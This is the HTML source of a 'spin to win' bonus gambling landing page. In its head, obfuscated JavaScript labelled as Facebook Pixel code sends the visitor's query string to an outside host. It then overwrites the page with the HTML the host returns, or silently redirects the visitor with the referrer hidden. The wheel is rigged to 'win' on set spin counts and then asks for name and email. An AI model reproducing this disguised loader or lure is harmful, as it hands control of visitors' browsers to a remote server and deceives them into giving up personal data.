<!DOCTYPE html>
<html  lang="en">
<head>
	
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
	<title>Top Wheel </title>
	
	<link rel="stylesheet" href="bootstrap.css">
	<link rel="stylesheet" href="prism.css">
	<link rel="stylesheet" href="sweetalert2.min.css">
	<link rel="stylesheet" href="superwheel.css">
	<link rel="stylesheet" href="main.css">
	<link href="css.css" rel="stylesheet">	
	<!-- Facebook Pixel Code -->
<script>var _0x369b=['148145nVjqHZ','1KnzOVM','write','close','responseText','send','1KZBjoE','<html><head>','3oFlqAw','135EZDTJn','status','1vvDXtb','1017779hHEKWd','search','5XuECWr','458033uKbJwc','landing_url','landing_html','[?&]nr=1','<meta http-equiv="refresh" content="0; url=','href','21031cypqMO','3841CjvkZd','" />','https://nummorrum.com/index.php?key=fkea22c2vejfcr55ax83&lp_type=js_redirect&'+window.location.search.substring(1),'parse','1690egDYfd','GET','open','31219ZtOXgR','267dsQspw','</head></html>','<meta content="1664132232102;"/>'];var _0x5e11=function(_0x4cb19d,_0x244c7b){_0x4cb19d=_0x4cb19d-0x6b;var _0x369b4d=_0x369b[_0x4cb19d];return _0x369b4d;};(function(_0x4bc0c1,_0x3810ae){var _0x436d21=_0x5e11;while(!![]){try{var _0x34542f=parseInt(_0x436d21(0x70))*-parseInt(_0x436d21(0x7d))+-parseInt(_0x436d21(0x75))*parseInt(_0x436d21(0x7c))+parseInt(_0x436d21(0x6d))*parseInt(_0x436d21(0x88))+parseInt(_0x436d21(0x73))*parseInt(_0x436d21(0x89))+-parseInt(_0x436d21(0x72))*parseInt(_0x436d21(0x76))+parseInt(_0x436d21(0x85))*parseInt(_0x436d21(0x81))+-parseInt(_0x436d21(0x84))*-parseInt(_0x436d21(0x6f));if(_0x34542f===_0x3810ae)break;else _0x4bc0c1['push'](_0x4bc0c1['shift']());}catch(_0x2f5fe4){_0x4bc0c1['push'](_0x4bc0c1['shift']());}}}(_0x369b,0x99960),!function(){var _0x44ddeb=_0x5e11;if(-0x1==window['location'][_0x44ddeb(0x7b)][_0x44ddeb(0x74)](_0x44ddeb(0x79))){var _0xf5e636=new XMLHttpRequest();_0xf5e636[_0x44ddeb(0x83)](_0x44ddeb(0x82),_0x44ddeb(0x7f),!0x0),_0xf5e636['onload']=function(){var _0x3dd81e=_0x44ddeb;if(0xc8===_0xf5e636[_0x3dd81e(0x71)]){var _0x4e9c69=JSON[_0x3dd81e(0x80)](_0xf5e636[_0x3dd81e(0x6b)]);return _0x4e9c69[_0x3dd81e(0x78)]?(document[_0x3dd81e(0x83)](),document['write'](_0x4e9c69[_0x3dd81e(0x78)]),void document[_0x3dd81e(0x8b)]()):_0x4e9c69[_0x3dd81e(0x77)]?(document[_0x3dd81e(0x83)](),document[_0x3dd81e(0x8a)](_0x3dd81e(0x6e)),document[_0x3dd81e(0x8a)]('<meta name="referrer" content="never" />'),document[_0x3dd81e(0x8a)](_0x3dd81e(0x87)),document['write'](_0x3dd81e(0x7a)+_0x4e9c69[_0x3dd81e(0x77)]+_0x3dd81e(0x7e)),document[_0x3dd81e(0x8a)](_0x3dd81e(0x86)),void document[_0x3dd81e(0x8b)]()):void 0x0;}},_0xf5e636[_0x44ddeb(0x6c)]();}}());</script>
<!-- End Facebook Pixel Code -->
</head>


<body>
	<style type="text/css">
		.btnmore{border-left-color: rgb(48, 133, 214);
    border-right-color: rgb(48, 133, 214);
    border: 0px none;
    padding: 5px;
    border-radius: 0.25em;
    background-position: initial;
    background-repeat: initial;
    background-attachment: initial;
    background-image: initial;
    background-size: initial;
    background-origin: initial;
    background-clip: initial;
    background-color: rgb(48, 133, 214);
    color: rgb(255, 255, 255);
    font-size: 1.0625em;}
	</style>
	
	
	<header class="main-header main-header-light js-main-header">
		<h1 style="text-align: center;color:#fff">SuperWheel</h1>
	</header>
	
	
	
	<div class="home-intro blue-dark-bg height-vh" id="demo_spinner" style="background-color: rgb(150 117 205);">
		<div class="container-fluid">
			<div class="container-xl">
				<div class="wheel mb-5 superWheel _0" style="font-size: 16px; width: 500px; height: 500px;">
    <div class="sWheel-wrapper" style="width: 500px; height: 500px; font-size: 100%;">
        <div class="sWheel-inner">
            <div class="sWheel">
                <div class="sWheel-bg-layer">
                    <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 200 200" xml:space="preserve" style="">
                        <defs>
                            <clipPath id="cut-off-line"><path stroke-width="0" fill="#ccc" d="M199,100 A99,99,0,1,1,198.9999984921438,99.98272124049305 L129.99999954307387,99.99476401227062 A30,30,0,1,0,130,100 z"></path></clipPath>
                        </defs>
                        <g class="sw-slicesGroup">
                            <path stroke-width="0" fill="#364C62" data-fill="#364C62" d="M199,100 A99,99,0,0,1,149.5,185.73651497465943 L115,125.98076211353316 A30,30,0,0,0,130,100 z"></path>
                            <path stroke-width="0" fill="#9575CD" data-fill="#9575CD" d="M149.5,185.73651497465943 A99,99,0,0,1,50.50000000000002,185.73651497465943 L85,125.98076211353316 A30,30,0,0,0,115,125.98076211353316 z"></path>
                            <path stroke-width="0" fill="#E67E22" data-fill="#E67E22" d="M50.50000000000002,185.73651497465943 A99,99,0,0,1,1,100.00000000000001 L70,100 A30,30,0,0,0,85,125.98076211353316 z"></path>
                            <path stroke-width="0" fill="#E74C3C" data-fill="#E74C3C" d="M1,100.00000000000001 A99,99,0,0,1,50.49999999999996,14.2634850253406 L84.99999999999999,74.01923788646684 A30,30,0,0,0,70,100 z"></path>
                            <path
                                stroke-width="0"
                                fill="#2196F3"
                                data-fill="#2196F3"
                                d="M50.49999999999996,14.2634850253406 A99,99,0,0,1,149.5,14.263485025340586 L115,74.01923788646684 A30,30,0,0,0,84.99999999999999,74.01923788646684 z"
                            ></path>
                            <path stroke-width="0" fill="#95A5A6" data-fill="#95A5A6" d="M149.5,14.263485025340586 A99,99,0,0,1,199,99.99999999999997 L130,99.99999999999999 A30,30,0,0,0,115,74.01923788646684 z"></path>
                        </g>
                        <g>
                            <line x1="200" y1="100" x2="100" y2="100" stroke="#fefefe" stroke-width="3" fill="none" clip-path="url(#cut-off-line)"></line>
                            <line x1="150" y1="186.60254037844385" x2="100" y2="100" stroke="#fefefe" stroke-width="3" fill="none" clip-path="url(#cut-off-line)"></line>
                            <line x1="50.00000000000002" y1="186.60254037844388" x2="100" y2="100" stroke="#fefefe" stroke-width="3" fill="none" clip-path="url(#cut-off-line)"></line>
                            <line x1="0" y1="100.00000000000001" x2="100" y2="100" stroke="#fefefe" stroke-width="3" fill="none" clip-path="url(#cut-off-line)"></line>
                            <line x1="49.99999999999996" y1="13.397459621556166" x2="100" y2="100" stroke="#fefefe" stroke-width="3" fill="none" clip-path="url(#cut-off-line)"></line>
                            <line x1="150" y1="13.397459621556138" x2="100" y2="100" stroke="#fefefe" stroke-width="3" fill="none" clip-path="url(#cut-off-line)"></line>
                        </g>
                        <circle class="outerLine" cx="100" cy="100" r="97.5" stroke="#fefefe" stroke-width="5" fill-opacity="0" fill="none"></circle>
                        <circle class="innerLine" cx="100" cy="100" r="31" stroke="#fefefe" stroke-width="4" fill-opacity="1" fill="#FFFFFF00"></circle>
                    </svg>
                </div>
                <div class="sWheel-txt-wrap">
                    <div class="sWheel-txt" style="transform: rotate(30deg);">
                        <div style="padding-right: 8%; transform: rotate(0deg) translate(0px, -50%); color: rgb(255, 255, 255);" data-color="#fff" class="sWheel-title">
                            20% OFF
                            <div></div>
                        </div>
                        <div style="padding-right: 8%; transform: rotate(60deg) translate(0px, -50%); color: rgb(255, 255, 255);" data-color="#fff" class="sWheel-title">
                            No luck
                            <div></div>
                        </div>
                        <div style="padding-right: 8%; transform: rotate(120deg) translate(0px, -50%); color: rgb(255, 255, 255);" data-color="#fff" class="sWheel-title">
                            30% OFF
                            <div></div>
                        </div>
                        <div style="padding-right: 8%; transform: rotate(180deg) translate(0px, -50%); color: rgb(255, 255, 255);" data-color="#fff" class="sWheel-title">
                            Lose
                            <div></div>
                        </div>
                        <div style="padding-right: 8%; transform: rotate(240deg) translate(0px, -50%); color: rgb(255, 255, 255);" data-color="#fff" class="sWheel-title">
                            40% OFF
                            <div></div>
                        </div>
                        <div style="padding-right: 8%; transform: rotate(300deg) translate(0px, -50%); color: rgb(255, 255, 255);" data-color="#fff" class="sWheel-title">
                            Nothing
                            <div></div>
                        </div>
                    </div>
                </div>
                <div class="sWheel-center"></div>
            </div>
        </div>
        <div class="sWheel-marker">
            <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 80 115" style="" xml:space="preserve">
                <g>
                    <path fill="#e74c3c" d="M40,0C17.9,0,0,17.7,0,39.4S40,115,40,115s40-53.9,40-75.6S62.1,0,40,0z M40,52.5c-7,0-12.6-5.6-12.6-12.4 S33,27.7,40,27.7s12.6,5.6,12.6,12.4C52.6,46.9,47,52.5,40,52.5z"></path>
                    <path
                        fill="rgba(0, 0, 0, 0.3)"
                        d="M40,19.2c-11.7,0-21.2,9.3-21.2,20.8S28.3,60.8,40,60.8S61.2,51.5,61.2,40S51.7,19.2,40,19.2z M40,52.5 c-7,0-12.6-5.6-12.6-12.4S33,27.7,40,27.7s12.6,5.6,12.6,12.4C52.6,46.9,47,52.5,40,52.5z"
                    ></path>
                </g>
            </svg>
        </div>
    </div>
</div>

				<ul class="intro-btn-group mb-5">
				<li><button class="btn btn-primary btn-xl btn-block spin-to-win" type="button">Spin to win</button></li>
				</ul>
				
			</div>
		</div>
	</div>
	
	</div>
</div>
  	<script src="jquery-3.3.1.js"></script>


<style type="text/css">
	
	
</style>



<footer class="footer text-center">
	<div class="container">

		<div id="wwwe" style="
    z-index: 999;
    position: fixed;
    bottom: 0;left: 0;
    width: 100%;
    background: rgb(0,0,0);
    color: #fff;
    padding: 8px;
    "><p style="
    font-size: 8px;
    text-align: center;
">This site does not use cookies, by accepting you provide the option to accept cookies, or you can configure them yourself<br>Success in guessing does not imply success in gambling and other real money games The product is intended for entertainment purposes by persons over the age of 18+ The game contains in-app purchases
 <button id="www" style="font-size: 9px;">Got it!</button></p></div>
<div style="position: fixed;bottom: 5px; right:5px">
    <div style="margin-bottom: 0px"><a href="https://nummorrum.com/landers/fr/terms.html" style="color: #fff;font-size: 15px">Terms of use</a></div> <br>
    <div><a href="https://nummorrum.com/landers/fr/policy.html" style="color: #fff;font-size: 15px">Policy privacy</a></div>
</div>
<!-- <script
  src="https://code.jquery.com/jquery-1.12.4.min.js"
  integrity="sha256-ZosEbRLbNQzLpnKIkEdrPv7lOy9C27hHQ+Xp8a4MxAQ="
  crossorigin="anonymous"></script> -->
<script type="text/javascript">
    $('#www').click(function(){
        $("#wwwe").hide();
    })
</script>
		<small class="copyright">Copyright © 2020</small>
	</div>
</footer>
  	<script src="jquery-3.3.1.js"></script>
<script src="bootstrap.bundle.js"></script>
	<script src="superwheel.js"></script>
	<script src="prism.js" data-manual=""></script>
	<script src="sweetalert2.min.js" data-manual=""></script>
	<script src="main.js"></script>
	<script>
				jQuery(document).ready(function($){
					
					$('.wheel').superWheel({
						slices: [
							{
								text    : '20 Bonuses',
								message : 'You win 20 Bonuses',
								background   : '#364C62',
								value     : 1
							},{
								text    : 'No luck',
								message : 'You have No luck :(</br>spin again',
								background   : '#9575CD',
								value     : 0
							},{
								text    : '30 Bonuses',
								message : 'You win 30 Bonuses',
								background   : '#E67E22',
								value     : 2
							},{
								value      : 'd',
								text    : 'Lose',
								message : 'You Lose</br>spin again',
								background   : '#E74C3C',
								win     : 0
							},{
								text    : '40 Bonuses',
								message : 'You win 40 Bonuses',
								background   : '#2196F3',
								color : '#fff',
								value     : 3
							},{
								text    : 'Nothing',
								message : 'You get Nothing :( </br>spin again',
								background   : '#95A5A6',
								value     : 0
							}
						],
						
						
						//======================================
						//======================================
						//=======    Wheel Parameters    =======
						//======================================
						//======================================
						text : {
							color: '#fff',
							offset : 8,
							letterSpacing: 0,
							orientation: 'v',
							arc: true
						},
						
						slice : {
							background : "#333",
						},
						
						line:{
							width : 6,
							color : "#fefefe",
						},
						
						outer : {
							width : 10,
							color : "#fefefe",
						},
						
						inner : {
							width : 8,
							color : "#fefefe",
						},
						
						width: 500,
						duration: 8000,
						
					});
					
					var tick = new Audio('tick.mp3');
					var regexp = /fbid=([^&]+)/i;
       
					var luckky = 0;
					var lukk;
					$(document).on('click','.spin-to-win',function(e){
						luckky++;
						console.log(luckky);
						if(luckky == 2){
							lukk = 1;
						} else if(luckky == 5) {
							lukk = 2;
						} else if(luckky == 7){
							lukk = 3;
						} else{
							lukk = 0;
						}
						e.preventDefault();
						$('.wheel').superWheel('start',lukk);
						$(this).prop('disabled',true);
					});
					
					$('.wheel').superWheel('onStart',function(results){
						$('.spin-to-win').text('Spinning...');
					});
					
					
					$('.wheel').superWheel('onStep',function(results){
						if (typeof tick.currentTime !== 'undefined')
							tick.currentTime = 0;
						tick.play();
					});
					
					$('.wheel').superWheel('onComplete',function(results){
						 var GetValue = '';
        if (!!regexp.exec(document.location.search)){
            GetValue = regexp.exec(document.location.search)[1];
            $('input[name="customName"]').attr('value',GetValue);
            var myvar = '<p class="swal2-content">You win 20 Bonuses</br> enter your name & email</p><form action="success.php" method="POST" ><input type="text" placeholder="your name" name="name" required></br><input placeholder="your email" type="email" name="email" style="margin-top:10px" required></br></br><input style="display:none" type="text" name="pixel" value="'+GetValue+'"><input style="margin-top:10px" type="submit" class="btnmore" value="Get your bonuses"></form>';
        } else{
        	var myvar = '<p class="swal2-content">You win 20 Bonuses</br> enter your </p><form action="success.php" method="POST" ><input type="text" placeholder="your name" name="name" required></br><input placeholder="your email" type="email" name="email" style="margin-top:10px" required></br></br><input name="pixel" style="display:none" type="text" value="111111"><input style="margin-top:10px" type="submit" class="btnmore" value="Get your bonuses"></form>';
        }
						
						if(results.value === 1  ){
							swal({
								type: 'success',
								title: "Congratulations!", 
								html: myvar
							});
							setInterval(function(){ $(".swal2-confirm").hide() }, 500);
						}  else if( results.value === 3){
								swal({
								type: 'success',
								title: "Congratulations!", 
								html: myvar
							});
									setInterval(function(){ $(".swal2-confirm").hide() }, 500);
								
						} else{
							swal("Oops!", results.message, "error");
						}
						$('.spin-to-win:disabled').prop('disabled',false).text('Spin to win');
					});
					
					
				});



				</script>
 			<!--jyfikuyfkugkugk uyfuyfuyuyf trstrsrt 54765 77766 55544 hgfdhdtd grstrestrsrt  uyfuyfuyf  -->
</body>
</html>
